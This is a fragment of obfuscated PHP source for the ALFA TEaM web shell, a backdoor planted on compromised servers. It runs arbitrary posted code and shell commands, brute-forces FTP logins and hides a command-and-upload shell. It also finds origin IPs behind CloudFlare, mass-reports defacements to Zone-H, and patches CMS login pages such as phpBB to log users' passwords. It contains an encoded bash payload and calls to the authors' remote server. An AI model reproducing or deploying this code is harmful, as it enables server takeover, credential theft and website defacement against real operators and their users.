class="listing"><font class="highlight_txt">Global value</td>" . "<td class="listing"><font class="highlight_txt">Local Value</td>" . "<td class="listing"><font class="highlight_txt">Access</td></tr>"; goto aoyUt; T31Mx: ob_start(); goto Tia9H; V2WeS: $tmp = ob_get_clean(); goto wDebR; ued13: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto y4w2I; NB92_: echo "<div class=header>"; goto T31Mx; aoyUt: foreach ($INI as $param => $values) { print "\xa" . "<tr>" . "<td class="listing"><b>" . $param . "</td>" . "<td class="listing">" . $values["global_value"] . " </td>" . "<td class="listing">" . $values["local_value"] . " </td>" . "<td class="listing">" . $values["access"] . " </td></tr>"; } goto V2WeS; wDebR: $tmp = preg_replace("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", '', $tmp); goto TG2Dr; Tia9H: $INI = ini_get_all(); goto SfTfu; y4w2I: } goto vFfCK; DVuGb: alfahead(); goto jbtJu; vFfCK: if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "info") { goto FMq4B; ItO_2: phpinfo(); goto Tezbg; ojcE9: $tmp = preg_replace("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", '', $tmp); goto DYJRQ; DYJRQ: $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); goto gpgh3; pfhCQ: ob_start(); goto ItO_2; FMq4B: echo "<div class=header><style>.p {color:#000;}</style>"; goto pfhCQ; Tezbg: $tmp = ob_get_clean(); goto ojcE9; gpgh3: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto MjTiJ; MjTiJ: } goto EGMLn; E0oqB: echo "</pre></div>"; goto Q94fp; vKwfd: foreach (array("php" => "php ~> [ Windows / Linux ]", "perl" => "perl ~> [ Linux ]", "python" => "python ~> [ Linux ]", "bash" => "bash ~> [ Linux ]") as $key => $val) { $lang_html .= "<option value="" . $key . "" " . ($_POST["alfa3"] == $key ? "selected" : '') . ">" . $val . "</option>"; } goto VHE1U; mRTd8: $lang_html = ''; goto vKwfd; EGMLn: if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "exten") { goto mS0vW; DZYcg: $EXT = get_loaded_extensions(); goto P14nb; mS0vW: echo "<div class=header>"; goto A4eLG; A4eLG: ob_start(); goto DZYcg; P14nb: echo "<table border=0><tr><td class="listing">" . implode("</td></tr>" . "\xa" . "<tr><td class="listing">", $EXT) . "</td></tr></table>" . count($EXT) . " extensions loaded"; goto gA3Fj; gA3Fj: echo "</div><br>"; goto RnxSZ; RnxSZ: } goto mRTd8; mkwE2: if (!empty($_POST["alfa1"])) { if ($_POST["alfa3"] == "php") { goto DNj2J; bKhZp: $result = htmlspecialchars(ob_get_clean()); goto oIw53; DNj2J: ob_start(); goto MIgFg; MIgFg: eval($_POST["alfa1"]); goto bKhZp; oIw53: } elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix") { goto SEo83; w7d3H: @unlink($filename); goto jhIql; eK33d: $lang = $_POST["alfa3"]; goto wLyal; TmVgI: $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}"); goto w7d3H; aZkpj: __write_file($filename, $_POST["alfa1"]); goto TmVgI; jhIql: @unlink($temp); goto xSnii; wLyal: $filename = "temp" . rand(11111, 99999); goto e6UM9; SEo83: if (isset($_SESSION["eval_tmpdir"])) { $tempdir = $_SESSION["eval_tmpdir"]; } else { $tempdir = dirname(alfaEx("mktemp")); $_SESSION["eval_tmpdir"] = $tempdir; } goto eK33d; e6UM9: $temp = $tempdir . "/" . $filename; goto aZkpj; xSnii: } echo "<textarea class=bigarea id="PhpCode">" . $result . "</textarea>"; } goto E0oqB; Q94fp: alfafooter(); goto weJPP; rWVQU: echo "</form><pre id=PhpOutput style="" . (empty($_POST["alfa1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; goto mkwE2; weJPP: } goto yiHNT; D494U: function Alfa_FTP_Cracker($info) { goto ceJBP; WO3rC: curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"); goto BE0ke; ceJBP: $url = $info["protocol"] . $info["target"]; goto fFI3e; XGwBG: $result = curl_exec($curl); goto F_8g9; F_8g9: $curl_errno = curl_errno($curl); goto jy_qv; Kmt0B: curl_close($curl); goto vU57K; UWMvF: if ($curl_errno > 0) { echo "<font color='red'>Error: {$curl_error}</font><br>"; } elseif (preg_match("/(\d+):(\d+)/i", $result)) { goto xtM6_; Z3XEV: $info["target"] = $url; goto JT9KT; xtM6_: echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; goto Z3XEV; JT9KT: CrackerResualt($info); goto jTjQs; jTjQs: } goto Kmt0B; yn4EB: curl_setopt($curl, CURLOPT_USERPWD, '' . $info["username"] . ":" . $info["password"] . ''); goto XGwBG; jy_qv: $curl_error = curl_error($curl); goto UWMvF; fFI3e: $curl = curl_init(); goto zC2UK; BE0ke: curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); goto yn4EB; zC2UK: curl_setopt($curl, CURLOPT_URL, $url); goto WO3rC; vU57K: } goto ceo7a; qXYAO: function alfaGetPathHistory() { echo isset($_SESSION[__PATH_HISTORY__]) && !empty($_SESSION[__PATH_HISTORY__]) ? $_SESSION[__PATH_HISTORY__] : $GLOBALS["home_cwd"]; } goto oBxdb; szIkW: $jgpUDiTPrk = "g" . "zi" . "nf" . "l" . "at" . "e" . ''; goto nJoUD; SlYwg: function Alfa_Create_A_Tag($action, $vals) { $nulls = array(); foreach ($vals as $key => $val) { goto T0MRW; D7PO2: $f = implode(",", $nulls); goto ih_7C; ih_7C: echo $f . ",'" . $val[0] . "');return false;">| " . $key . " | </a>"; goto ZgISS; ZgISS: unset($nulls); goto CjETU; H8g8X: for ($i = 1; $i <= $val[1] - 1; $i++) { $nulls[] = "null"; } goto D7PO2; T0MRW: echo "<a href=javascript:void(0) onclick="g('" . $action . "',"; goto H8g8X; CjETU: } } goto lrZ3X; udtXj: function clean_string($string) { if (function_exists("iconv")) { $s = trim($string); $s = iconv("UTF-8", "UTF-8//IGNORE", $s); } return $s; } goto Sr2OM; c16Cg: $GLOBALS["cwd"] = isset($_SESSION[__LAST_CWD__]) && $_SESSION[__LAST_CWD__] != '' && !isset($_POST["c"]) ? $_SESSION[__LAST_CWD__] : @getcwd(); goto L1bCG; dF_Vy: function alfaHijackCms($cms, $cmspath, $saveto) { switch ($cms) { case "vb": hijackvBulletin($cmspath, $saveto); break; case "wp": hijackwp($cmspath, $saveto); break; case "jom": hijackJoomla($cmspath, $saveto); break; case "whmcs": hijackWhmcs($cmspath, $saveto); break; case "mybb": hijackMybb($cmspath, $saveto); break; case "ipb": hijackIPB($cmspath, $saveto); break; case "phpbb": hijackPHPBB($cmspath, $saveto); break; default: echo "error!"; break; } } goto s1zW6; UpqQn: function alfacloudflare() { goto ed6IX; NNO9V: if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { goto dOYmW; hWfBW: if (preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url, $matches)) { if ($matches[2] != "www") { $url = preg_replace("/^(https?):\/\//", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } goto l4WnK; wpNkm: if (preg_match("/cloudflare/i", $server)) { echo "
[+] CloudFlare detected: {$server}\xa<br>"; } else { echo "\xa[+] CloudFlare wasn't detected, proceeding anyway.\xa"; } goto jVHkh; VIYH8: echo __pre(); goto wpNkm; qgSyt: for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . $url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "(Null)") { continue; } echo "Trying {$site}: {$ip}\xa<br>"; } goto gRkuu; dOYmW: $url = $_POST["alfa1"]; goto YhdOW; wTXup: echo "[+] Searching for more IP addresses.
\xa<br><br>"; goto qgSyt; l4WnK: if (is_array($server)) { $server = $server[0]; } goto VIYH8; gRkuu: echo "
[+] Finished.
<br>"; goto aY4ZB; jVHkh: echo "[+] CloudFlare IP: " . is_ipv4(gethostbyname($url)) . "\xa\xa<br><br>"; goto wTXup; YhdOW: if (!preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url)) { $url = preg_replace("/^(https?):\/\//", '', $url); $url = "http://www." . $url; } goto k_NiK; k_NiK: $headers = @get_headers($url, 1); goto Id031; Wsfkc: $subs = array("owa.", "2tty.", "m.", "gw.", "mx1.", "store.", "1", "2", "vb.", "news.", "download.", "video", "cpanel.", "ftp.", "server1.", "cdn.", "cdn2.", "ns.", "ns3.", "mail.", "webmail.", "direct.", "direct-connect.", "record.", "ssl.", "dns.", "help.", "blog.", "irc.", "forum.", "dl.", "my.", "cp.", "portal.", "kb.", "support.", "search.", "docs.", "files.", "accounts.", "secure.", "register.", "apps.", "beta.", "demo.", "smtp.", "ns2.", "ns1.", "server.", "shop.", "host.", "web.", "cloud.", "api.", "exchange.", "app.", "vps.", "owa.", "sat.", "bbs.", "movie.", "music.", "art.", "fusion.", "maps.", "forums.", "acc.", "cc.", "dev.", "ww42.", "wiki.", "clients.", "client.", "books.", "answers.", "service.", "groups.", "images.", "upload.", "up.", "tube.", "users.", "admin.", "administrator.", "private.", "design.", "whmcs.", "wp.", "wordpress.", "joomla.", "vbulletin.", "test.", "developer.", "panel.", "contact."); goto hWfBW; Id031: $server = $headers["Server"]; goto Wsfkc; aY4ZB: } goto WtWqY; qgw1X: alfafooter(); goto kDUM1; UKry5: AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); goto PTN1h; WtWqY: echo "</div>"; goto qgw1X; PTN1h: echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit="g('cloudflare',null,this.url.value,'>>'); return false;" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder="target.com"> <input type='submit' name='go' value=' ' /></p></form></center>"; goto NNO9V; ed6IX: alfahead(); goto UKry5; kDUM1: } goto MetfZ; gGXFd: if ($_POST["a"] != "GetPathHistory") { if ($_SESSION[__LAST_CWD__] != $_POST["c"]) { $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__]; } } goto PDb5Q; bdXxs: function __pre() { return "<pre id="strOutput" style="margin-top:5px" class="ml1">"; } goto LowdX; a8cEH: function alfaPermsColor($f, $isbash = false) { goto LLiLv; yHXZ1: $num = ''; goto ADSvQ; N5oFG: if ($isbash) { goto G2d4m; G2d4m: $class = $f["class"]; goto A7Ndv; V5JWg: $human = $f["human"]; goto b5BPO; A7Ndv: $num = $f["num"]; goto V5JWg; b5BPO: } else { goto y4w8X; C66xs: $human = alfaPerms(@fileperms($f)); goto wgbIP; y4w8X: $num = substr(sprintf("%o", @fileperms($f)), -4); goto C66xs; wgbIP: if (!@is_readable($f)) { $class = "main_red_perm"; } elseif (!@is_writable($f)) { $class = "main_white_perm"; } else { $class = "main_green_perm"; } goto BhU90; BhU90: } goto VwDqC; LLiLv: $class = ''; goto yHXZ1; ADSvQ: $human = ''; goto N5oFG; VwDqC: return "<span style="font-weight:unset;" class="" . $class . "">" . $num . "</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="" . $class . "">" . $human . "</span>"; goto KJX89; KJX89: } goto lG0uK; i967k: $GLOBALS["home_cwd"] = @getcwd(); goto gGXFd; ZDeKS: function CrackerResualt($info) { goto Wifaq; QVBbl: @fwrite($c, $res); goto wZatZ; wZatZ: @fclose($c); goto TCctu; Wifaq: $res = $info["target"] . " => " . $info["username"] . ":" . $info["password"] . "\xa"; goto KDpYE; KDpYE: $c = @fopen($info["fcrack"], "a+"); goto QVBbl; TCctu: } goto jF6QH; kxiel: function alfaWhich($p) { goto iSiZa; Qiukx: if (!empty($path)) { return strlen($path); } goto B8Pb2; B8Pb2: return false; goto eP16w; iSiZa: $path = alfaEx("which " . $p, false, false); goto Qiukx; eP16w: } goto NIscI; B1TDg: function alfazoneh() { goto yok4F; OZlwP: foreach ($hackmode as $mode) { echo "<option style="background-color: rgb(F, F, F);" value="" . $x . "">" . $mode . "</option>"; $x++; } goto wC_Pz; oTIWz: $x = 1; goto OZlwP; Ijp5w: echo "</div>"; goto Ez95R; QV477: $x = 1; goto Ekwl3; yok4F: alfahead(); goto TrQfm; Ekwl3: foreach ($reason as $mode) { echo "<option style="background-color: rgb(F, F, F);" value="" . $x . "">" . $mode . "</option>"; $x++; } goto feGyS; tFqWl: if (!function_exists("curl_version")) { echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>"; } goto sUmVS; vbkDB: $reason = array("Heh...just for fun!", "Revenge against that website", "Political reasons", "As a challenge", "I just want to be the best defacer", "Patriotism", "Not available"); goto zx1FF; zx1FF: echo "
<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
\xa<form action="" method="post" onsubmit="g('zoneh',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,'>>'); return false;">\xd\xa<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
\xa<br>\xd
<select id="text" name="hackmode" style="width:400px;">"; goto oTIWz; IK_VR: if ($_POST["alfa5"] && $_POST["alfa5"] == ">>") { goto yfBrU; rIulM: while ($i < count($sites)) { if (substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://" . $sites[$i]; } $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=" . $hacker . "&domain1=" . $sites[$i] . "&hackmode=" . $method . "&reason=" . $neden); ++$i; } goto e21r_; e21r_: echo __pre() . "<center><font color ="#00A220"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>"; goto Q1xBS; riW9_: $neden = $_POST["alfa3"]; goto t3U4e; fZceI: $alfa = new AlfaCURL(); goto rIulM; hESxW: $method = $_POST["alfa2"]; goto riW9_; sbw_2: $sites = explode("
", $site); goto fZceI; yfBrU: ob_start(); goto HkgzF; mEhd3: if (empty($hacker)) { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>"); } elseif ($method == "------------------------------------SELECT-------------------------------------") { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>"); } elseif ($neden == "------------------------------------SELECT-------------------------------------") { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST SELECT THE REASON [+]</b></font></center>"); } elseif (empty($site)) { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>"); } goto rj02j; t3U4e: $site = $_POST["alfa4"]; goto mEhd3; HkgzF: $hacker = $_POST["alfa1"]; goto hESxW; rj02j: $i = 0; goto sbw_2; Q1xBS: } goto Ijp5w; wC_Pz: echo "</select><br><select id="text" name="reason" style="width:200px;">"; goto QV477; TrQfm: echo "<div class=header>"; goto tFqWl; sUmVS: $hackmode = array("known vulnerability (i.e. unpatched system)", "undisclosed (new) vulnerability", "configuration / admin. mistake", "brute force attack", "social engineering", "Web Server intrusion", "Web Server external module intrusion", "Mail Server intrusion", "FTP Server intrusion", "SSH Server intrusion", "Telnet Server intrusion", "RPC Server intrusion", "Shares misconfiguration", "Other Server intrusion", "SQL Injection", "URL Poisoning", "File Inclusion", "Other Web Application bug", "Remote administrative panel access bruteforcing", "Remote administrative panel access password guessing", "Remote administrative panel access social engineering", "Attack against administrator(password stealing/sniffing)", "Access credentials through Man In the Middle attack", "Remote service password guessing", "Remote service password bruteforce", "Rerouting after attacking the Firewall", "Rerouting after attacking the Router", "DNS attack through social engineering", "DNS attack through cache poisoning", "Not available", "Cross-Site Scripting"); goto vbkDB; feGyS: echo "</select><br>\xd
<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
<p><input type="submit" value=" " name="go" /></p>\xd\xa</form></center>"; goto IK_VR; Ez95R: alfafooter(); goto ad80J; ad80J: } goto uM4l3; hg5T3: function __alert($s) { echo "<center>" . __pre() . $s . "</center>"; } goto IBuaD; XBe80: function alfaGetDomains($state = false) { goto j761M; j761M: $state = "named.conf"; goto HBsel; cVK7l: return array("lines" => $lines, "state" => $state); goto HIQwf; Y2Cxd: $lines = _alfa_file("/etc/named.conf"); goto FL37k; FL37k: if (!$lines) { goto krXDj; krXDj: $lines = @scandir("/etc/valiases/"); goto Wltd6; Wltd6: $state = "valiases"; goto bxqMo; bxqMo: if (!$lines) { goto l12Md; l12Md: $lines = @scandir("/var/named"); goto FnwTZ; FnwTZ: $state = "named"; goto vHZ2S; vHZ2S: if (!$lines && $state) { $lines = _alfa_file("/etc/passwd"); $state = "passwd"; } goto Wmx3l; Wmx3l: } goto VdQaZ; VdQaZ: } goto cVK7l; HBsel: $lines = array(); goto Y2Cxd; HIQwf: } goto e_w5I; kOVkY: function hijackPHPBB($path, $saveto) { goto nFRVU; kBB7a: $find = "case 'login':"; goto i0xJb; i0xJb: $code = str_replace("{saveto_path}", $saveto, $code); goto YvBaB; RnJWA: $evil_login = "	" . $find . "
\x9" . $code; goto AkKmw; nFRVU: $code = "$Alfa_u = request_var('username', '');$Alfa_p = request_var('password', '');if($Alfa_u != '' AND $Alfa_p != ''){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response['status'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response['user_row']['user_email']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}"; goto kBB7a; YvBaB: $login = $path . "/ucp.php"; goto RnJWA; AkKmw: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { goto tHY1U; lmejZ: @file_put_contents($login, $login_replace); goto LMYYS; LMYYS: hijackOutput(0, $saveto); goto o9EiL; tHY1U: $login_replace = str_replace($find, $evil_login, $data_login); goto lmejZ; o9EiL: } else { hijackOutput(1); } } else { hijackOutput(1); } goto EeJkJ; EeJkJ: } goto KWEwD; J3y62: function __ZGVjb2Rlcg($s) { return QFdAWqZnUX($s); } goto tsIKa; L1bCG: if (!@is_dir) { $GLOBALS["cwd"] = @getcwd(); } goto j_AU1; MOuuo: function alfa_getColor($target) { if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != '') { return $GLOBALS["DB_NAME"]["color"][$target]; } else { $target = $GLOBALS["__ALFA_COLOR__"][$target]; if (is_array($target)) { return $target["key_color"]; } else { return $target; } } } goto xj_Ot; wokKq: if (isset($_GET["solevisible"])) { goto bHXeG; bOk5W: echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto jXXrt; JPz2g: echo "<title>Solevisible Hidden Shell</title>"; goto d2cF0; d2cF0: echo "<body bgcolor=#000000>"; goto U5StE; AZ34X: $safe_mode = @ini_get("safe_mode"); goto IBQ89; U5StE: echo "<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">" . (function_exists("php_uname") ? php_uname() : "???") . "</font></b></big>"; goto AZ34X; XoEml: echo "PWD:<font color=#FFFFFF> " . str_replace("\", "/", @getcwd()) . "/<br />"; goto tf3iI; XN47e: echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; goto rrELF; I2AuM: echo "<html>"; goto JPz2g; AK7Sn: exit; goto XQFYZ; cYFxU: if (isset($_POST["command_solevisible"])) { goto g40H1; SJzmF: $solevisible = "cd '" . addslashes(str_replace("\", "/", @getcwd())) . "'" . $separator . '' . __ZGVjb2Rlcg($_POST["command_solevisible"]); goto lsjdx; lsjdx: echo alfaEx($solevisible); goto Mjlop; g40H1: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $separator = "&"; } else { $separator = ";"; } goto SJzmF; Mjlop: } goto trAAk; rrELF: echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists("gethostbyname") ? @gethostbyname($_SERVER["HTTP_HOST"]) : "???") . "</font><br><p>"; goto l1o2w; Jbtgr: echo "{$disfun}"; goto f2feY; jXXrt: echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />"; goto XoEml; svyMX: echo "<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>\xd\xa<hr><pre>"; goto cYFxU; YUIjA: echo "<font color=#7CFC00>Disable functions : </font>"; goto pRMW0; trAAk: echo "</pre>
\xa</body></html>"; goto AK7Sn; X35di: echo "CWD: <input type="text" name="cwd" value="" . str_replace("\", "/", @getcwd()) . "/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>"; goto Y0oLO; f2feY: echo "</font><br>"; goto XN47e; bHXeG: @error_reporting(E_ALL ^ E_NOTICE); goto I2AuM; l1o2w: echo "<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; goto X35di; Y0oLO: if (isset($_FILES["file"])) { if (@move_uploaded_file($_FILES["file"]["tmp_name"], __ZGVjb2Rlcg(@$_POST["cwd"]) . "/" . $_FILES["file"]["name"])) { echo "<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>"; } else { echo "<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>"; } } goto svyMX; kdOks: if (empty($disfun)) { $disfun = "<font color="green">NONE</font>"; } goto tGSvO; IBQ89: if ($safe_mode) { $r = "<b style='color: red'>On</b>"; } else { $r = "<b style='color: green'>Off</b>"; } goto ISo4s; tf3iI: echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>"; goto YUIjA; ISo4s: echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>"; goto bOk5W; tGSvO: echo "<font color=red>"; goto Jbtgr; pRMW0: $disfun = @ini_get("disable_functions"); goto kdOks; XQFYZ: } goto yItN7; CNXC7: function alfaupdateheader() { if (!isset($_SESSION["updateheader_data"])) { goto VMKro; xTUJW: $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa", false, true, true); goto cSTb_; cSTb_: if (@is_array(@json_decode($data, true))) { $_SESSION["updateheader_data"] = $data; echo $data; } goto n1UbJ; pJxx9: alfaWriteTocgiapi("getheader.alfa", $bash); goto xTUJW; x1kid: $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"])); goto pJxx9; VMKro: $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw=="; goto x1kid; n1UbJ: } else { echo $_SESSION["updateheader_data"]; } } goto lgB26; go6An: function alfadlfile() { if (isset($_POST["c"], $_POST["file"])) { goto js7OC; Bl6oL: $_POST["file"] = str_replace("//", "/", $_POST["c"] . "/" . $basename); goto zN33z; xoE0t: if (@is_file($_POST["file"]) && @is_readable($_POST["file"]) || $alfa_canruncmd) { goto GfJdv; iGlBf: if (isset($GLOBALS["glob_chdir_false"])) { goto P4Umd; hnzJO: if (_alfa_is_writable($scriptpath)) { goto m3p6F; m3p6F: alfaEx("cp '" . addslashes($_POST["file"]) . "' '" . addslashes($filepath) . "'"); goto nZTad; xp3e3: @unlink($filepath); goto k11pP; nZTad: readfile($filepath); goto xp3e3; k11pP: } else { alfaEx("cat '" . addslashes($_POST["file"]) . "'"); } goto d4RJM; XfVE6: $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]); goto e3CM3; e3CM3: $filepath = $scriptpath . "/" . $randname; goto hnzJO; P4Umd: $randname = $basename . rand(111, 9999); goto XfVE6; d4RJM: } else { readfile($_POST["file"]); } goto Yjrqe; Y6AoW: header("Content-Disposition: attachment; filename="" . addslashes($basename) . """); goto Uuk5N; GfJdv: ob_start("ob_gzhandler", 4096); goto Y6AoW; Uuk5N: header("Content-Type: application/octet-stream"); goto iGlBf; Yjrqe: } else { echo "Error...!"; } goto aIErk; js7OC: $basename = rawurldecode(basename($_POST["file"])); goto Bl6oL; zN33z: $alfa_canruncmd = _alfa_can_runCommand(true, true); goto xoE0t; aIErk: } } goto YmHhB; ObjKp: function _alfa_php_cmd($in, $re = false) { goto drhzx; drhzx: $out = ''; goto EkDmr; A3hyo: return $out; goto NkMLt; EkDmr: try { if ($re) { $in = $in . " 2>&1"; } if (function_exists("exec")) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists("passthru")) { goto snU7g; go6IX: $out = ob_get_clean(); goto eIxIs; snU7g: ob_start(); goto KMJuP; KMJuP: @passthru($in); goto go6IX; eIxIs: } elseif (function_exists("system")) { goto jUH_T; rHdMV: @system($in); goto SUL21; SUL21: $out = ob_get_clean(); goto jh13m; jUH_T: ob_start(); goto rHdMV; jh13m: } elseif (function_exists("shell_exec")) { $out = shell_exec($in); } elseif (function_exists("popen") && function_exists("pclose")) { if (is_resource($f = @popen($in, "r"))) { goto fvYOV; N14UJ: while (!@feof($f)) { $out .= fread($f, 1024); } goto XBWxH; XBWxH: pclose($f); goto dRmfb; fvYOV: $out = ''; goto N14UJ; dRmfb: } } elseif (function_exists("proc_open")) { goto kt3Nb; Z90cH: $out = @stream_get_contents($pipes[1]); goto snUor; Bs_Y2: $process = @proc_open($in . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); goto Z90cH; kt3Nb: $pipes = array(); goto Bs_Y2; snUor: } elseif (class_exists("COM")) { goto om5aZ; om5aZ: $alfaWs = new COM("WScript.shell"); goto dKyQo; DVHhT: $out = $stdout->ReadAll(); goto TDQ23; AdarK: $stdout = $exec->StdOut(); goto DVHhT; dKyQo: $exec = $alfaWs->exec("cmd.exe /c " . $_POST["alfa1"]); goto AdarK; TDQ23: } } catch (Exception $e) { } goto A3hyo; NkMLt: } goto JaYCP; tFDUs: function alfaplus() { goto r2Yem; TbBml: alfafooter(); goto NtrIZ; p1Htw: if ($_POST["alfa1"] == "news" || $_POST["alfa1"] == "tools") { try { goto FF5Do; M28rz: if ($xml) { if (@simplexml_load_string($xml)) { goto iqSwK; iqSwK: $doc = new DOMDocument(); goto VUkGC; AHfVu: foreach ($items as $item) { goto pwUF9; SPffh: $link = $item->getElementsByTagName("link")->item(0)->nodeValue; goto myruA; EtJ6e: $description = $item->getElementsByTagName("description")->item(0)->nodeValue; goto SPffh; myruA: $pubDate = $item->getElementsByTagName("pubDate")->item(0)->nodeValue; goto WjSvP; pwUF9: $title = $item->getElementsByTagName("title")->item(0)->nodeValue; goto EtJ6e; WjSvP: echo __pre() . "<center><a href='{$link}' target='_blank'>{$title}</a><br>{$description}<br><small><font  color='#FFFFFF'><b>Date: {$pubDate}</b></font></small></center></pre>"; goto oEJ4W; oEJ4W: } goto vzvBo; haLGW: $data = $doc->getElementsByTagName("data")->item(0); goto yV2gp; yV2gp: $items = $data->getElementsByTagName("item"); goto AHfVu; VUkGC: $doc->loadXML($xml); goto haLGW; vzvBo: } else { echo $msg; } } else { echo $msg; } goto VpANV; FF5Do: $s1 = "http://solevisible.com/" . ($_POST["alfa1"] == "news" ? "news.php" : "tools.php"); goto CAnAJ; eOzlg: $news = new AlfaCURL(); goto lc9JW; CAnAJ: $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>"; goto eOzlg; lc9JW: if ($news->Send($s1)) { $xml = $news->Send($s1); } else { $xml = false; } goto M28rz; VpANV: } catch (Exception $e) { echo $e->getMessage(); } } elseif ($_POST["alfa1"] == "about") { echo __pre() . "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>\xd
<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>\xd\xa<font color='#00A220'>Contact : [email protected]</font><br>
<font color='#00A220'>Telegram Channel: @solevisible</font><br>\xd
